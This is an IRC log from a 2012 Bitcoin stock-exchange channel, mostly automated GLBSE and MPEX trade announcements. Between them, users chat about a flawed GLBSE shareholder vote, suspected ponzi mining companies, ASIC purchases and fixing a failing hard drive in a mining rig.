try to make a case and have the fbi or whoever look into it Sep 13 22:02:23 His daddy said he was gonna give him a spanking Sep 13 22:02:52 im trying to confirm that DonSherant is not a troll account but im not sure yet Sep 13 22:03:07 payb.tc so far has not seemed interested in working with us. Sep 13 22:03:32 however i have most of the info we need from him anyway, thank you block chain Sep 13 22:07:37 [MPEX] [S.MPOE] 56829 @ 0.00039303 = 22.3355 BTC [-] Sep 13 22:07:42 located way to far? Sep 13 22:07:50 thailand is about as far as you can get from texas... Sep 13 22:10:08 hi copumkin Sep 13 22:10:13 [GLBSE] [MMM] 1 @ 1 BTC [+] Sep 13 22:10:15 you sober now? Sep 13 22:11:38 [GLBSE] [SS] 10 @ 0.027 = 0.27 BTC [+] Sep 13 22:23:46 [GLBSE] [GIGAMINING] 1 @ 0.6179 BTC [-] Sep 13 22:30:02 [GLBSE] [GIGAMINING] 1 @ 0.6179 BTC [-] Sep 13 22:32:05 [GLBSE] [BITBOND] 1 @ 0.386999 BTC [+] Sep 13 22:32:38 [MPEX] [F.GIGA.ETF] 9800 @ 0.00040534 = 3.9723 BTC [-] Sep 13 22:40:51 [GLBSE] [GIGAMINING] 1 @ 0.61 BTC [-] Sep 13 22:41:34 [GLBSE] [GIGAMINING] 10 @ 0.6 = 6 BTC [-] Sep 13 22:46:59 [GLBSE] [OBSI.HRPT] 18 @ 0.09999999 = 1.8 BTC [+] Sep 13 22:47:32 [GLBSE] [OBSI.HRPT] 3620 @ 0.1 = 362 BTC [+] Sep 13 22:47:33 [GLBSE] [OBSI.HRPT] 20 @ 0.1 = 2 BTC [+] Sep 13 22:47:35 [GLBSE] [OBSI.HRPT] 15 @ 0.1 = 1.5 BTC [+] Sep 13 22:47:36 [GLBSE] [OBSI.HRPT] 174 @ 0.1 = 17.4 BTC [+] Sep 13 22:47:37 [GLBSE] [OBSI.HRPT] 420 @ 0.1 = 42 BTC [+] Sep 13 22:47:38 [GLBSE] [OBSI.HRPT] 151 @ 0.1 = 15.1 BTC [+] Sep 13 22:48:32 [GLBSE] [OBSI.HRPT] 53 @ 0.1 = 5.3 BTC [+] Sep 13 22:54:26 https://glbse.com/vote/view/126 Sep 13 22:54:27 lol Sep 13 22:54:30 nefario already screwed up Sep 13 22:54:47 "it's" Sep 13 22:54:55 try the ticker Sep 13 22:55:04 I get an internal server error if I click Sep 13 22:55:07 probably cause I'm not logged in Sep 13 22:55:12 I love 500s Sep 13 22:55:30 [GLBSE] [PAJKA.BOND] 1 @ 0.0821 BTC [+] Sep 13 22:55:40 Im not logged in and I can view it Sep 13 22:55:44 I _cant_ log in Sep 13 22:56:05 why is that on the DI asset? Sep 13 22:56:15 because it's fucked? Sep 13 22:56:18 like most things on that site :) Sep 13 22:56:26 Obsi: the greed scrambled nefario's brain Sep 13 22:56:37 lol Sep 13 22:56:51 the most egregious error though Sep 13 22:56:54 0% required to pass motion? Sep 13 22:56:56 is that he spelled its with an apostrophe Sep 13 22:57:05 he's irish neh ? Sep 13 22:57:10 engluish not his native language. Sep 13 22:57:11 yeah, 0% Sep 13 22:57:13 ANYONE votes Sep 13 22:57:14 even 1 share Sep 13 22:57:27 0% just means it's already passed Sep 13 22:57:36 copumpkin: thats even worse Sep 13 22:57:38 sorry Diablo-D3 Sep 13 22:57:39 screenshot time Sep 13 22:57:41 you're screwed Sep 13 22:57:46 [MPEX] [F.GIGA.ETF] 3900 @ 0.00040861 = 1.5936 BTC [+] Sep 13 22:57:47 [MPEX] [F.GIGA.ETF] 16000 @ 0.00041132 = 6.5811 BTC [+] Sep 13 22:57:52 we need a motion to remove nefario as owner of glbse Sep 13 22:58:02 Diablo-D3: you had your due process Sep 13 22:58:05 and the motion passed! Sep 13 22:58:57 [GLBSE] [PAJKA.BOND] 4 @ 0.08235 = 0.3294 BTC [+] Sep 13 22:59:12 [MPEX] [F.GIGA.ETF] 8303 @ 0.00041292 = 3.4285 BTC [+] Sep 13 22:59:13 [MPEX] [F.GIGA.ETF] 15000 @ 0.00041329 = 6.1994 BTC [+] Sep 13 22:59:15 [MPEX] [F.GIGA.ETF] 10800 @ 0.00041412 = 4.4725 BTC [+] Sep 13 22:59:16 [MPEX] [F.GIGA.ETF] 26868 @ 0.00041436 = 11.133 BTC [+] Sep 13 22:59:16 [MPEX] [F.GIGA.ETF] 46044 @ 0.00041606 = 19.1571 BTC [+] Sep 13 22:59:17 [MPEX] [F.GIGA.ETF] 21500 @ 0.00041699 = 8.9653 BTC [+] Sep 13 22:59:18 [MPEX] [F.GIGA.ETF] 29200 @ 0.00041707 = 12.1784 BTC [+] Sep 13 22:59:20 [MPEX] [F.GIGA.ETF] 42100 @ 0.00041855 = 17.621 BTC [+] Sep 13 22:59:21 [MPEX] [F.GIGA.ETF] 5800 @ 0.00041971 = 2.4343 BTC [+] Sep 13 22:59:22 [MPEX] [F.GIGA.ETF] 44000 @ 0.00042163 = 18.5517 BTC [+] Sep 13 23:00:27 Odd, I dont own DMC and it let me vote. Sep 13 23:00:36 Thats a redo if you asked me. Sep 13 23:00:38 yeah but it won't count it Sep 13 23:00:46 ahh ok that makes sense Sep 13 23:00:54 it counts it by how many shares voted Sep 13 23:01:33 fuck reboot desktop time Sep 13 23:01:38 Voted to let Obama run DMC. Sep 13 23:01:55 i wonder... if you transfer shares to another acc, does it let you vote again Sep 13 23:02:08 it lets you change the vote I think Sep 13 23:02:17 kakobrekla hmm good q Sep 13 23:02:58 it would require some serious tracking Sep 13 23:03:05 kinda doubt its implemented Sep 13 23:03:16 so i assume votes can be rigged Sep 13 23:03:28 doubtful... just let 1 share = 1 vote Sep 13 23:03:58 Obsi but you move the votedness in transfers? Sep 13 23:04:42 not sure if it follows or resets, but you can change the vote on newly purchased shares up till the motion ends Sep 13 23:04:45 unless you track each share you cant really know Sep 13 23:04:52 unless you lockdown transfers and trading Sep 13 23:04:56 with every vote Sep 13 23:04:59 on every asset Sep 13 23:06:38 maybe it's just counted on motion end Sep 13 23:07:02 well you can see or could see mean result Sep 13 23:09:30 [MPEX] [F.GIGA.ETF] 4653 @ 0.00044441 = 2.0678 BTC [+] Sep 13 23:09:31 [MPEX] [F.GIGA.ETF] 33700 @ 0.0004445 = 14.9797 BTC [+] Sep 13 23:09:33 [MPEX] [F.GIGA.ETF] 44900 @ 0.00044476 = 19.9697 BTC [+] Sep 13 23:09:34 [MPEX] [F.GIGA.ETF] 5933 @ 0.00044779 = 2.6567 BTC [+] Sep 13 23:09:35 [MPEX] [F.GIGA.ETF] 42229 @ 0.00044868 = 18.9473 BTC [+] Sep 13 23:09:36 [MPEX] [F.GIGA.ETF] 12611 @ 0.00045166 = 5.6959 BTC [+] Sep 13 23:09:48 [GLBSE] [OBSI.HRPT] 75 @ 0.1 = 7.5 BTC [+] Sep 13 23:10:36 [GLBSE] [PLATINUM] 1 @ 0.00999899 BTC [+] Sep 13 23:10:36 [MPEX] [F.GIGA.ETF] 7000 @ 0.00041234 = 2.8864 BTC [-] Sep 13 23:10:38 [MPEX] [F.GIGA.ETF] 11681 @ 0.00040534 = 4.7348 BTC [-] Sep 13 23:10:39 [MPEX] [F.GIGA.ETF] 24949 @ 0.00040522 = 10.1098 BTC [-] Sep 13 23:10:40 [MPEX] [F.GIGA.ETF] 31460 @ 0.0004049 = 12.7382 BTC [-] Sep 13 23:10:41 [MPEX] [F.GIGA.ETF] 20747 @ 0.00040472 = 8.3967 BTC [-] Sep 13 23:10:42 [GLBSE] [BDK.BND] 3 @ 0.09998 = 0.2999 BTC [+] Sep 13 23:10:43 [MPEX] [F.GIGA.ETF] 21200 @ 0.00040413 = 8.5676 BTC [-] Sep 13 23:10:45 [MPEX] [F.GIGA.ETF] 36300 @ 0.00040251 = 14.6111 BTC [-] Sep 13 23:10:45 [MPEX] [F.GIGA.ETF] 25500 @ 0.00040132 = 10.2337 BTC [-] Sep 13 23:10:46 [MPEX] [F.GIGA.ETF] 33000 @ 0.00040109 = 13.236 BTC [-] Sep 13 23:10:47 [MPEX] [F.GIGA.ETF] 4608 @ 0.00039487 = 1.8196 BTC [-] Sep 13 23:10:48 [MPEX] [F.GIGA.ETF] 3555 @ 0.00039364 = 1.3994 BTC [-] Sep 13 23:12:15 !ticker gigamining Sep 13 23:12:18 [GLBSE:GIGAMINING] [Bid: 0.6001] [Ask: 0.6179] [Spread: 0.0178] [Last: 0.6] [24hVol: 43.43939] [7dAvg: 0.62729553] Sep 13 23:12:21 !ticker f.giga.etf Sep 13 23:12:22 [MPEX:F.GIGA.ETF] 1day: 0.00039364 / 0.00041497 / 0.00045166 (997605 shares, 413.98 BTC), 30day: 0.00030644 / 0.00077924 / 0.00113797 (13910957 shares, 10,840.10 BTC) Sep 13 23:12:29 now that's odd Sep 13 23:12:34 [GLBSE] [TEEK.B] 3 @ 0.26 = 0.78 BTC [-] Sep 13 23:14:14 [GLBSE] [JAH] 10 @ 0.139 = 1.39 BTC [+] Sep 13 23:16:23 [MPEX] [S.DICE] 8000 @ 0.00331 = 26.48 BTC [-] Sep 13 23:17:29 [GLBSE] [JTME] 1 @ 0.5 BTC [-] Sep 13 23:18:05 [MPEX] [F.GIGA.ETF] 15689 @ 0.00045166 = 7.0861 BTC [+] Sep 13 23:18:05 [MPEX] [F.GIGA.ETF] 43000 @ 0.00045193 = 19.433 BTC [+] Sep 13 23:18:59 [MPEX] [F.GIGA.ETF] 311 @ 0.000452 = 0.1406 BTC [+] Sep 13 23:19:00 [MPEX] [F.GIGA.ETF] 5745 @ 0.00039364 = 2.2615 BTC [-] Sep 13 23:19:02 [MPEX] [F.GIGA.ETF] 33944 @ 0.00039054 = 13.2565 BTC [-] Sep 13 23:21:53 [GLBSE] [YABMC] 3 @ 0.1073 = 0.3219 BTC [+] Sep 13 23:22:41 [GLBSE] [YABMC] 10 @ 0.1074 = 1.074 BTC [+] Sep 13 23:29:11 [GLBSE] [ASICMINER] 2 @ 0.1139998 = 0.228 BTC [+] Sep 13 23:29:19 :mircea_popescu What is the total float of F.GIGA.ETF? Sep 13 23:29:30 http://adterrasperaspera.com/images/GLBSE.png Sep 13 23:29:32 for those that care Sep 13 23:29:56 Sep 08 20:35:52 [MPEX] [F.GIGA.ETF] [PAID] 1100000 @ 0.0000634 = 69.74 BTC Sep 13 23:30:12 last it was reported Sep 13 23:31:19 hm Sep 13 23:31:30 now also bdk kluge is out of the game Sep 13 23:31:43 that fails to surprise me.. Sep 13 23:31:56 space is really geting claned Sep 13 23:32:01 cleaned Sep 13 23:32:32 http://www.youtube.com/watch?v=gSjLiQxEZlM Sep 13 23:32:42 huzzah for the wikipedia financiers. Sep 13 23:34:28 [GLBSE] [GIGAMINING] 2 @ 0.6001 = 1.2002 BTC [+] Sep 13 23:44:15 [MPEX] [S.MPOE] 3512 @ 0.00039303 = 1.3803 BTC [-] Sep 13 23:44:16 [MPEX] [S.MPOE] 28388 @ 0.00039296 = 11.1553 BTC [-] Sep 13 23:45:00 [GLBSE] [ASICMINER] 4 @ 0.11299 = 0.452 BTC [-] Sep 13 23:45:02 [GLBSE] [ASICMINER] 5 @ 0.113 = 0.565 BTC [+] Sep 13 23:45:02 [GLBSE] [ASICMINER] 8 @ 0.1139999 = 0.912 BTC [+] Sep 13 23:45:04 [GLBSE] [ASICMINER] 7 @ 0.114 = 0.798 BTC [+] Sep 13 23:45:05 [GLBSE] [ASICMINER] 50 @ 0.1148999 = 5.745 BTC [+] Sep 13 23:45:06 [GLBSE] [ASICMINER] 26 @ 0.11489999 = 2.9874 BTC [+] Sep 13 23:46:32 [GLBSE] [BBBB] 20099 @ 0.00019 = 3.8188 BTC [-] Sep 13 23:46:59 [GLBSE] [GSDPT] 300 @ 0.0034 = 1.02 BTC [+] Sep 13 23:47:21 [GLBSE] [BITBOND] 1 @ 0.38 BTC [-] Sep 13 23:47:22 [GLBSE] [BITBOND] 3 @ 0.352 = 1.056 BTC [-] Sep 13 23:47:24 [GLBSE] [BITBOND] 9 @ 0.351 = 3.159 BTC [-] Sep 13 23:47:25 [GLBSE] [BITBOND] 10 @ 0.35000011 = 3.5 BTC [-] Sep 13 23:47:26 [GLBSE] [BITBOND] 63 @ 0.325 = 20.475 BTC [-] Sep 13 23:48:01 [GLBSE] [FPGA.CONTRACT] 6 @ 0.0717 = 0.4302 BTC [+] Sep 13 23:48:21 [GLBSE] [BBBB] 20099 @ 0.00019 = 3.8188 BTC [-] Sep 13 23:52:29 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 13 23:52:47 >20999 Sep 13 23:52:51 >3.8 btc Sep 13 23:53:32 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 13 23:54:45 [GLBSE] [BITCOINMINV] 17 @ 0.126999 = 2.159 BTC [+] Sep 13 23:54:47 [GLBSE] [BITCOINMINV] 63 @ 0.127 = 8.001 BTC [+] Sep 13 23:56:11 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 13 23:56:42 [GLBSE] [BITCOINMINV] 16 @ 0.127 = 2.032 BTC [+] Sep 13 23:57:19 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 14 00:00:52 [GLBSE] [GSDPT] 10242 @ 0.0034 = 34.8228 BTC [+] Sep 14 00:04:49 Diablo-D3 mpex-style. Sep 14 00:09:31 [MPEX] [S.MPOE] 23933 @ 0.00039296 = 9.4047 BTC [-] Sep 14 00:09:32 [MPEX] [S.MPOE] 28131 @ 0.00039296 = 11.0544 BTC [-] Sep 14 00:09:57 [GLBSE] [OBSI.HRPT] 10 @ 0.0999 = 0.999 BTC [-] Sep 14 00:10:38 [GLBSE] [OBSI.HRPT] 13 @ 0.0999 = 1.2987 BTC [-] Sep 14 00:13:29 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 14 00:13:30 [GLBSE] [OBSI.HRPT] 8 @ 0.0999 = 0.7992 BTC [-] Sep 14 00:27:26 mircea_popescu: as long as we dont have a south korean singing this its fine Sep 14 00:27:50 lol Sep 14 00:31:25 [GLBSE] [OBSI.HRPT] 16 @ 0.0999 = 1.5984 BTC [-] Sep 14 00:32:33 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 14 00:33:50 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 14 00:34:35 [MPEX] [S.MPOE] 14269 @ 0.00039296 = 5.6071 BTC [-] Sep 14 00:34:37 [MPEX] [S.MPOE] 7686 @ 0.00039292 = 3.02 BTC [-] Sep 14 00:35:18 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 14 00:36:20 [GLBSE] [BBBB] 20999 @ 0.00019 = 3.9898 BTC [-] Sep 14 00:39:48 [GLBSE] [BBBB] 25000 @ 0.00019 = 4.75 BTC [-] Sep 14 00:43:25 nefario still hasnt fixed the motion Sep 14 00:43:39 I think hes lost all credibility at this point Sep 14 00:44:16 ;;later tell obsi msg me Sep 14 00:44:17 The operation succeeded. Sep 14 00:48:36 [GLBSE] [ASICMINER] 1 @ 0.11479864 BTC [-] Sep 14 00:49:48 [GLBSE] [FPGAMINING] 1 @ 0.70995 BTC [+] Sep 14 00:55:00 [GLBSE] [OBSI.HRPT] 1 @ 0.0999 BTC [-] Sep 14 00:59:12 hehe last black dynamite is awesome Sep 14 00:59:48 [MPEX] [F.GIGA.ETF] 20300 @ 0.000485 = 9.8455 BTC [+] Sep 14 01:03:52 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 14 01:04:29 [GLBSE] [ASICMINER] 4 @ 0.11479863 = 0.4592 BTC [-] Sep 14 01:04:47 [GLBSE] [OBSI.HRPT] 1 @ 0.0999 BTC [-] Sep 14 01:06:23 [GLBSE] [BIB.BVPS] 5 @ 0.0045 = 0.0225 BTC [+] Sep 14 01:11:45 [GLBSE] [RAREEARTH] 2 @ 0.00955 = 0.0191 BTC [+] Sep 14 01:23:00 mircea_popescu: Why are there asks listed for O.BTCUSD.C100T ? (and where has the volume for options gone?) Sep 14 01:23:20 or why are there *no* asks for O.BTCUSD.C100T Sep 14 01:23:33 well, prolly the bot got bought out Sep 14 01:23:43 it only has a limited qty of contracts to sell. Sep 14 01:23:54 and im not sure what you mean about volume ? Sep 14 01:24:57 [MPEX] [S.MPOE] 29921 @ 0.00039358 = 11.7763 BTC [+] Sep 14 01:24:59 [MPEX] [S.MPOE] 32565 @ 0.00039363 = 12.8186 BTC [+] Sep 14 01:27:04 Well, I guess adding up the monthly volume totals it is strong, just visually the charts any of the call options looks sparse. Lot more PUT options. Sep 14 01:27:15 Someone must see something I don't. Sep 14 01:27:31 sgornick i gave up trying to comprehend wtf with the option buys months ago. Sep 14 01:28:10 but there's something like 30k contracts sold this month, which is i think a little more than last Sep 14 01:28:19 people tend to gang on them towards end, less time value Sep 14 01:30:54 Are these binary options? Sep 14 01:31:11 settles at 1BTC if over, 0 if under? Sep 14 01:31:45 [GLBSE] [OBSI.HRPT] 5 @ 0.0998 = 0.499 BTC [-] Sep 14 01:33:05 Onevermind I found the info page Sep 14 01:34:30 [GLBSE] [OBSI.HRPT] 2 @ 0.0998 = 0.1996 BTC [-] Sep 14 01:38:17 [GLBSE] [CPA] 20 @ 0.0329 = 0.658 BTC [-] Sep 14 01:38:17 [GLBSE] [CPA] 19 @ 0.03299999 = 0.627 BTC [+] Sep 14 01:38:19 [GLBSE] [CPA] 41 @ 0.033 = 1.353 BTC [+] Sep 14 01:39:58 !ticker gigamining Sep 14 01:40:01 [GLBSE:GIGAMINING] [Bid: 0.6001] [Ask: 0.6179] [Spread: 0.0178] [Last: 0.6001] [24hVol: 44.63959] [7dAvg: 0.62654595] Sep 14 01:40:09 !ticker f.giga.etf Sep 14 01:40:11 [MPEX:F.GIGA.ETF] 1day: 0.00039054 / 0.00041822 / 0.000485 (1066594 shares, 446.08 BTC), 30day: 0.00030644 / 0.00077549 / 0.00113797 (13994946 shares, 10,853.01 BTC) Sep 14 01:46:03 [GLBSE] [PUREMINING] 3 @ 0.0959 = 0.2877 BTC [+] Sep 14 01:50:00 [MPEX] [S.MPOE] 36935 @ 0.00039292 = 14.5125 BTC [-] Sep 14 01:53:00 !ticker cognitive Sep 14 01:53:07 [GLBSE:COGNITIVE] [Bid: 0.6] [Ask: 0.6338] [Spread: 0.0338] [Last: 0.55] [24hVol: ] [7dAvg: 0.55625294] Sep 14 01:53:11 !ticker btc-mining Sep 14 01:53:13 [GLBSE:BTC-MINING] [Bid: 0.87] [Ask: 0.995] [Spread: 0.125] [Last: 0.996] [24hVol: 19.92] [7dAvg: 0.96058] Sep 14 01:53:28 !ticker YABMC Sep 14 01:53:31 [GLBSE:YABMC] [Bid: 0.0907] [Ask: 0.10735] [Spread: 0.01665] [Last: 0.1074] [24hVol: 39.9959] [7dAvg: 0.10900774] Sep 14 01:53:39 !ticker FPGAMINING Sep 14 01:53:41 [GLBSE:FPGAMINING] [Bid: 0.635] [Ask: 0.70995] [Spread: 0.07495] [Last: 0.70995] [24hVol: 41.21495] [7dAvg: 0.76700514] Sep 14 01:57:21 [GLBSE] [GSDPT] 7 @ 0.0034 = 0.0238 BTC [+] Sep 14 02:13:50 [GLBSE] [OBSI.HRPT] 3 @ 0.0998 = 0.2994 BTC [-] Sep 14 02:14:46 [GLBSE] [OBSI.HRPT] 3 @ 0.0999 = 0.2997 BTC [+] Sep 14 02:15:11 [MPEX] [F.GIGA.ETF] 5915 @ 0.00048371 = 2.8611 BTC [-] Sep 14 02:15:13 [MPEX] [S.MPOE] 1031 @ 0.00039363 = 0.4058 BTC [+] Sep 14 02:15:14 [MPEX] [S.MPOE] 41094 @ 0.00039465 = 16.2177 BTC [+] Sep 14 02:15:15 [MPEX] [S.MPOE] 5008 @ 0.00039473 = 1.9768 BTC [+] Sep 14 02:26:06 [GLBSE] [COGNITIVE] 7 @ 0.6338 = 4.4366 BTC [+] Sep 14 02:26:30 [GLBSE] [ASICMINER] 3 @ 0.114798 = 0.3444 BTC [-] Sep 14 02:29:16 [GLBSE] [MOORE] 1 @ 0.4945 BTC [-] Sep 14 02:29:18 [GLBSE] [MOORE] 3 @ 0.495 = 1.485 BTC [+] Sep 14 02:40:16 [MPEX] [F.GIGA.ETF] 1600 @ 0.00047591 = 0.7615 BTC [-] Sep 14 02:49:12 [GLBSE] [FOO.PPPPT] 7 @ 0.034 = 0.238 BTC [+] Sep 14 02:49:40 [GLBSE] [BIB.PIRATE] 1 @ 0.048 BTC [+] Sep 14 02:50:45 [GLBSE] [TYGRR.BOND-P] 7 @ 0.03652199 = 0.2557 BTC [+] Sep 14 02:50:46 [GLBSE] [TYGRR.BOND-P] 3 @ 0.03669202 = 0.1101 BTC [+] Sep 14 02:52:28 [GLBSE] [TYGRR.BOND-P] 3 @ 0.03669202 = 0.1101 BTC [+] Sep 14 03:05:22 [MPEX] [S.MPOE] 3892 @ 0.00039473 = 1.5363 BTC [+] Sep 14 03:05:23 [MPEX] [S.MPOE] 16261 @ 0.00039475 = 6.419 BTC [+] Sep 14 03:15:39 [MPEX] [F.GIGA.ETF] 7200 @ 0.0004688 = 3.3754 BTC [-] Sep 14 03:15:41 [MPEX] [F.GIGA.ETF] 32000 @ 0.00046868 = 14.9978 BTC [-] Sep 14 03:15:42 [MPEX] [F.GIGA.ETF] 5800 @ 0.00041282 = 2.3944 BTC [-] Sep 14 03:21:36 [GLBSE] [TYGRR.BOND-P] 5 @ 0.03669202 = 0.1835 BTC [+] Sep 14 03:21:38 [GLBSE] [TYGRR.BOND-P] 14 @ 0.0372078 = 0.5209 BTC [+] Sep 14 03:21:39 [GLBSE] [TYGRR.BOND-P] 7 @ 0.03999999 = 0.28 BTC [+] Sep 14 03:21:40 [GLBSE] [TYGRR.BOND-P] 10 @ 0.04 = 0.4 BTC [+] Sep 14 03:26:10 [GLBSE] [NYAN.C] 2 @ 0.355 = 0.71 BTC [+] Sep 14 03:26:11 [GLBSE] [NYAN.C] 40 @ 0.37 = 14.8 BTC [+] Sep 14 03:26:57 [GLBSE] [NYAN.C] 5 @ 0.398 = 1.99 BTC [+] Sep 14 03:33:55 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 14 03:41:30 [MPEX] [S.MPOE] 25000 @ 0.00039331 = 9.8328 BTC [-] Sep 14 03:41:32 [MPEX] [S.MPOE] 2793 @ 0.00039292 = 1.0974 BTC [-] Sep 14 03:41:33 [MPEX] [S.MPOE] 807 @ 0.0003929 = 0.3171 BTC [-] Sep 14 03:44:40 [GLBSE] [NASTY] 1 @ 0.5552 BTC [+] Sep 14 03:50:37 [GLBSE] [YABMC] 1 @ 0.10735 BTC [-] Sep 14 04:06:36 [MPEX] [S.MPOE] 11800 @ 0.0003929 = 4.6362 BTC [-] Sep 14 04:09:23 _wow_ Sep 14 04:09:27 nefario just ended glbse Sep 14 04:09:29 in one single post Sep 14 04:09:50 thats just wow Sep 14 04:10:10 ? Sep 14 04:10:20 https://bitcointalk.org/index.php?topic=77469.msg1189206#msg1189206 Sep 14 04:10:41 ?! Sep 14 04:10:57 thats just insane Sep 14 04:11:05 does he even realize what he wrote? Sep 14 04:13:34 oh, i thought you were saying that he was shutting down Sep 14 04:13:53 no **** BEGIN LOGGING AT Fri Sep 14 12:47:49 2012 Sep 14 13:03:24 lol smoovious Sep 14 13:03:41 glbse was more than just pirate, however it turns out most of glbse was pirate so i guess maybe not Sep 14 13:06:16 [MPEX] [S.MPOE] 21856 @ 0.00039529 = 8.6395 BTC [-] Sep 14 13:13:07 [GLBSE] [FPGA.CONTRACT] 3 @ 0.07 = 0.21 BTC [-] Sep 14 13:13:50 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0661 = 0.1322 BTC [-] Sep 14 13:19:55 [GLBSE] [FPGAMINING] 4 @ 0.699999 = 2.8 BTC [-] Sep 14 13:21:16 [GLBSE] [GIGAMINING] 3 @ 0.6002 = 1.8006 BTC [-] Sep 14 13:21:51 [GLBSE] [ASICMINER] 1 @ 0.1195 BTC [+] Sep 14 13:26:14 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 14 13:31:21 [MPEX] [S.MPOE] 1006 @ 0.00039584 = 0.3982 BTC [+] Sep 14 13:31:21 [MPEX] [S.MPOE] 47377 @ 0.00039585 = 18.7542 BTC [+] Sep 14 13:31:23 [MPEX] [S.MPOE] 8317 @ 0.00039607 = 3.2941 BTC [+] Sep 14 13:33:12 [GLBSE] [NASTY] 2 @ 0.555 = 1.11 BTC [+] Sep 14 13:38:07 i wonder how many non mining operations are going to default Sep 14 13:38:14 or rather not default Sep 14 13:41:17 [GLBSE] [YABMC] 1 @ 0.0995 BTC [-] Sep 14 13:46:52 mining operation which defaults isn`t really a mining company ;) Sep 14 13:47:05 its a scam that way Sep 14 13:47:25 pay with other assets div and tell ppl you own hardware Sep 14 13:49:00 well whatever diablo was doing was yeah crazy Sep 14 13:49:13 mining comapny and then turn it into a ponzi Sep 14 13:49:23 but the other people should not fail i woud hope Sep 14 13:56:38 [MPEX] [S.MPOE] 28173 @ 0.00039529 = 11.1365 BTC [-] Sep 14 13:56:39 [MPEX] [S.MPOE] 4698 @ 0.00039489 = 1.8552 BTC [-] Sep 14 13:59:04 depends how the asic runs go. Sep 14 14:01:34 If I was investing in a mining company and they were buying GPUs or FPGAs right now..... That's a bit worse don't you think? Buying up non-ASIC hardware would be a waste of money. Sep 14 14:03:43 Even back then... That would be my gamble, I'd hedge for ASICs big time. Sep 14 14:03:53 Easy to say now.... Sep 14 14:05:26 I agree, buying up singles seems like it would have been a good move. Sep 14 14:06:20 The real test is when they will ship. First to market has such an advantage. Sep 14 14:07:39 EB250 D3 sold his stock and bought that obsi thing, i agree it has not been proven to be a ponzi but yeah... it does not look good for a mining company Sep 14 14:08:15 [MPEX] [O.BTCUSD.P010T] 20 @ 0.02693108 = 0.5386 BTC [+] Sep 14 14:08:35 tygrr tech one of the oldest mining operations on glbse 1.0 is selling off its hardware, let me know if you guys need an old tech :) Sep 14 14:08:51 yeah, i want to set up an operation on there but i cant pay out in btc Sep 14 14:08:56 [MPEX] [O.BTCUSD.P010T] 27 @ 0.02624383 = 0.7086 BTC [-] Sep 14 14:08:59 the value would be based in the real world Sep 14 14:09:17 smoovious you just got a dividend :) and more will come as i sell hardware Sep 14 14:10:01 you can sell it for .1 btc if you wish Sep 14 14:10:03 I'm bummed, I don't think I'll be ordering an ASIC right away... Cost is just too much. Sep 14 14:10:16 i wont buy asic until i see it is real Sep 14 14:10:21 and i will never buy from bfl Sep 14 14:10:42 Ya, that's too much too. :( Sep 14 14:11:35 Ya, reclamer, modminer, ect. Sep 14 14:12:36 I really like that they intend to drop around the same time. Makes me think that the mining ecosystem could turn out ok. And that makes Vlad less of an issue. Sep 14 14:12:37 [MPEX] [O.BTCUSD.P010T] 27 @ 0.01601091 = 0.4323 BTC [-] Sep 14 14:13:59 Go for it, the more retailers the better. I'm selling signed jerseys right now. Sep 14 14:15:29 Ya, I'm convinced that people WANT to spend bitcoins! They get excited and probably talk to people who may scoff. Show off some gear, the fruits of the labor. Sep 14 14:18:01 Yup. That's a pretty cool reason to start reselling if you are not in N. America or something. Sep 14 14:18:49 Ya, not you in this example.... I'm guessing it's not such an issue to buy American gear. Sep 14 14:19:48 There's a ton of value in that for bitcoin. It's suited so well for international transactions. Sep 14 14:20:13 [GLBSE] [METAL.SILVER] 1 @ 0.15 BTC [+] Sep 14 14:21:33 That's sortta my deal with the jerseys. I'm a middleman. Sep 14 14:27:59 i sold of a lot of mining cards Sep 14 14:28:17 what does it mean if the hdd is clicking like 5 to 7 times and nothing will load Sep 14 14:28:18 [GLBSE] [YABMC] 4 @ 0.1 = 0.4 BTC [+] Sep 14 14:28:31 like get to the mainboar bios screen and freeze Sep 14 14:28:36 bad Sep 14 14:28:37 bad hdd or bad mb? Sep 14 14:28:48 clicking hdd is likely bad hdd Sep 14 14:28:54 yeah it spins Sep 14 14:29:03 so its the hdd? Sep 14 14:29:04 try spinrite on it if you need to recover data Sep 14 14:29:13 might take a few days Sep 14 14:29:13 i dont need the data, its just a mining rig Sep 14 14:29:18 ahh - k Sep 14 14:29:29 but odds are its the hdd Sep 14 14:29:37 thing is i took it to the shop and they got it running Sep 14 14:29:44 Chaang-Noi Can you see the SMART data? Sep 14 14:29:45 now i can Sep 14 14:30:03 what is the controller? Sep 14 14:30:10 something inside the hdd? Sep 14 14:30:16 on the MB Sep 14 14:30:23 i dont know what SMART data is oneminer Sep 14 14:30:42 The SMART test is run at boot. BIOS may have info from that test. Sep 14 14:30:58 all i see is the msi logo and it locks up Sep 14 14:31:40 Ooo Sep 14 14:31:44 i hate to take it back to the shop again after they spent an hour trying to fix it and then got it up and running... Sep 14 14:31:47 ahh grrr Sep 14 14:32:13 I suggest booting from a live CD and trying some kind of diagnostic. Sep 14 14:32:36 its been down for 2 months Sep 14 14:32:42 im trying to get them ready to sell on the market Sep 14 14:32:48 as used gaming rigs Sep 14 14:32:53 oh fucl Sep 14 14:33:00 its starting windows! Sep 14 14:33:09 after like 5 mins Sep 14 14:33:12 kill it? Sep 14 14:33:15 what why? Sep 14 14:33:29 oh lol Sep 14 14:33:32 his attempt at humor Sep 14 14:33:35 hahaha Sep 14 14:33:35 yeah i have windows7 on there Sep 14 14:33:42 I Sep 14 14:33:43 selling it to gamers Sep 14 14:33:48 I <3 Win7 Sep 14 14:33:57 but damn, why did it take 5 mins to load up? Sep 14 14:34:07 the drive Sep 14 14:34:11 more than likely Sep 14 14:34:15 oh so the drive is just bad? Sep 14 14:34:18 bad sectors perhaps Sep 14 14:34:26 hmm Sep 14 14:34:41 im going to reboot see what happens Sep 14 14:35:22 well its thailand and it gets fucking hot here Sep 14 14:35:23 Throwing errors, error check takes up some time. You should scan it for whatever. 